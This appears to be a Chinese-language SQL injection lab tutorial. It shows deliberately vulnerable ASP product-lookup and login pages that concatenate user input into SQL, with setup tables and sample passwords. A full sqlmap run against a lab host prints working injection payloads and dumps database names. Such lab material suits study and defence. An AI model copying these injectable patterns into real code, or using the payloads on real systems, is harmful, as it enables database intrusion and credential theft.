<%
02     
03    dim prodId
04    prodId = Request.QueryString("id")
05     
06    set conn = server.createObject("ADODB.Connection")
07    set rs = server.createObject("ADODB.Recordset")
08     
09    query = "select prodName from products where id = " & prodId
10     
11    conn.Open "Provider=SQLOLEDB; Data Source=(local); Initial Catalog=数据库; User Id=sa; Password=密码"
12    rs.activeConnection = conn
13    rs.open query
14     
15    if not rs.eof then
16    response.write "Got product " & rs.fields("prodName").value
17    else
18    response.write "No product found"
19    end if
20     
21    %>
SQL语句： 创建一个数据库，然后查询这些

1     create table products
2     (
3     id int identity(1,1) not null,
4     prodName varchar(50) not null,
5     )
6      
7     insert into products(prodName) values('1')
8     insert into products(prodName) values('2')
9     insert into products(prodName) values('3')
 

01    root@Dis9Team:/pen# sqlmap -u "http://5.5.5.134/sql.asp?id=1" --dbs

02     
03        sqlmap/1.0-dev (r4911) - automatic SQL injection and database takeover tool
04        http://www.2cto.com
05     
06    [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
07     
08    [*] starting at 13:10:54
09     
10    [13:10:55] [INFO] using '/pen/sqlmap-dev/output/5.5.5.134/session' as session file
11    [13:10:55] [INFO] resuming back-end DBMS 'microsoft sql server 2005' from session file
12    [13:10:55] [INFO] testing connection to the target url
13    [13:10:55] [INFO] heuristics detected web page charset 'ascii'
14    sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
15    ---
16    Place: GET
17    Parameter: id
18        Type: boolean-based blind
19        Title: AND boolean-based blind - WHERE or HAVING clause
20        Payload: id=1 AND 2431=2431
21     
22        Type: error-based
23        Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
24        Payload: id=1 AND 5223=CONVERT(INT,(CHAR(58)+CHAR(106)+CHAR(107)+CHAR(99)+CHAR(58)+(SELECT (CASE WHEN (5223=5223) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(111)+CHAR(107)+CHAR(122)+CHAR(58)))
25     
26        Type: UNION query
27        Title: Generic UNION query (NULL) - 1 column
28        Payload: id=-3220 UNION SELECT CHAR(58)+CHAR(106)+CHAR(107)+CHAR(99)+CHAR(58)+CHAR(107)+CHAR(102)+CHAR(75)+CHAR(122)+CHAR(97)+CHAR(84)+CHAR(120)+CHAR(83)+CHAR(79)+CHAR(83)+CHAR(58)+CHAR(111)+CHAR(107)+CHAR(122)+CHAR(58)-- 
29     
30        Type: stacked queries
31        Title: Microsoft SQL Server/Sybase stacked queries
32        Payload: id=1; WAITFOR DELAY '0:0:5';--
33     
34        Type: AND/OR time-based blind
35        Title: Microsoft SQL Server/Sybase time-based blind
36        Payload: id=1 WAITFOR DELAY '0:0:5'--
37    ---
38     
39    [13:10:55] [INFO] the back-end DBMS is Microsoft SQL Server
40    web server operating system: Windows XP
41    web application technology: ASP, Microsoft IIS 5.1
42    back-end DBMS: Microsoft SQL Server 2005
43    [13:10:55] [INFO] fetching database names
44    [13:10:55] [INFO] the SQL query used returns 5 entries
45    [13:10:55] [INFO] retrieved: "master"
46    [13:10:55] [INFO] retrieved: "model"
47    [13:10:55] [INFO] retrieved: "msdb"
48    [13:10:55] [INFO] retrieved: "myDB"
49    [13:10:55] [INFO] retrieved: "tempdb"
50    available databases [5]:                                                       
51    [*] master
52    [*] model
53    [*] msdb
54    [*] myDB
55    [*] tempdb
56     
57    [13:10:55] [INFO] Fetched data logged to text files under '/pen/sqlmap-dev/output/5.5.5.134'
58     
59    [*] shutting down at 13:10:55
60     
61    root@Dis9Team:/pen#

1     ---------------------------------------------------伟大的分割线--
2     post sql
3     sql:

01    <PRE class="brush:php; toolbar: true; auto-links: true;">create table users 
02    ( 
03    userId int identity(1,1) not null, 
04    userName varchar(50) not null, 
05    userPass varchar(20) not null 
06    ) 
07     
08    insert into users(userName, userPass) values('john', 'doe') 
09    insert into users(userName, userPass) values('admin', 'wwz04ff') 
10    insert into users(userName, userPass) values('fsmith', 'mypassword')</PRE>
view source
 
print?
1     asp:
view source
 
print?
01    <PRE class="brush:php; toolbar: true; auto-links: true;"><% 
02    dim userName, password, query 
03    dim conn, rS 
04     
05    userName = Request.Form("userName") 
06    password = Request.Form("password") 
07     
08    set conn = server.createObject("ADODB.Connection") 
09    set rs = server.createObject("ADODB.Recordset") 
10     
11    query = "select count(*) from users where userName='" &  
12    userName & "' and userPass='" & password & "'"
13     
14    conn.Open "Provider=SQLOLEDB; Data Source=(local);  
15    Initial Catalog=myDB; User Id=sa; Password=" 
16    rs.activeConnection = conn 
17    rs.open query 
18     
19    if not rs.eof then 
20    response.write "Logged In"
21    else
22    response.write "Bad Credentials"
23    end if
24    %>
</PRE>HTML提交表单：<PRE class="brush:php; toolbar: true; auto-links: true;"><DIV class="postmessage firstpost"><PRE class="brush:php; toolbar: true; auto-links: true;"><form name="frmLogin" action="ASP.asp" method="post"> 
25    Username: <input type="text" name="userName"> 
26    Password: <input type="text" name="password"> 
27    <input type="submit"> 
28    </form></PRE></DIV>
29    </PRE>